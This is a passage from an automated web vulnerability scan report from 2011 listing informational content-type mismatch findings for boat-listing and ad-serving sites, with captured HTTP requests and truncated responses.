Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:13:09 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 570
Content-Type: text/javascript

searchSuggestion(["re",
["<span class=\\\"suggest\\\">re</span>d jacket firearms","<span class=\\\"suggest\\\">re</span>ed hastings","<span class=\\\"suggest\\\">re</span>ggie williams","<span class=
...[SNIP]...

18.3. http://www.boats.com/includes/script_declarations.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.boats.com
Path:	/includes/script_declarations.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

18.4. http://www.yachtworld.com/clarkslanding/images/e323276.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/clarkslanding/images/e323276.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /clarkslanding/images/e323276.jpg HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/clarkslanding/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.24.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.7.10.1296155835; s_pers=%20s_nr%3D1296156312387%7C1298748312387%3B%20s_lv%3D1296156312389%7C1390764312389%3B%20s_lv_s%3DFirst%2520Visit%7C1296158112389%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:24:51 GMT
Server: Apache
Last-Modified: Thu, 01 Feb 2007 22:10:20 GMT
ETag: "47c2-428717e2aeb00"
Accept-Ranges: bytes
Content-Length: 18370
Cache-Control: max-age=31536000
Expires: Fri, 27 Jan 2012 19:24:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................

..................................................................................................
...[SNIP]...

18.5. http://www.yachtworld.com/clarkslanding/images/e86210.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/clarkslanding/images/e86210.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /clarkslanding/images/e86210.jpg HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/clarkslanding/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.24.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.7.10.1296155835; s_pers=%20s_nr%3D1296156312387%7C1298748312387%3B%20s_lv%3D1296156312389%7C1390764312389%3B%20s_lv_s%3DFirst%2520Visit%7C1296158112389%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:24:51 GMT
Server: Apache
Last-Modified: Thu, 01 Feb 2007 22:10:20 GMT
ETag: "1a30-428717e2aeb00"
Accept-Ranges: bytes
Content-Length: 6704
Cache-Control: max-age=31536000
Expires: Fri, 27 Jan 2012 19:24:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.............!Adobe.d...................?...............%..%/$.$/,$##$,:22222:C======CCCCCCCCCCCCCCCCCCCCCCCCCCCCC.......$..$3$.$3B3))3BCB>2>BCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
...[SNIP]...

18.6. http://www.yachtworld.com/core/recentlyviewedboatsSRP previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/core/recentlyviewedboatsSRP

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /core/recentlyviewedboatsSRP?indexOfViewedBoats=0&r=0.7417761511169374 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:24 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1210

   <ul class="topLevel">
       <li class="mrvbHeader">
           <h1>My Recently Viewed Boats</h1>
       </li>
       <li class="content">
           <div id="mrvbTab-nav-wrapper">
               <ul id="mrvbTab-nav" >



...[SNIP]...

19. Content type is not specified previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:19:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Thu Jan 27 19:20:18 CST 2011.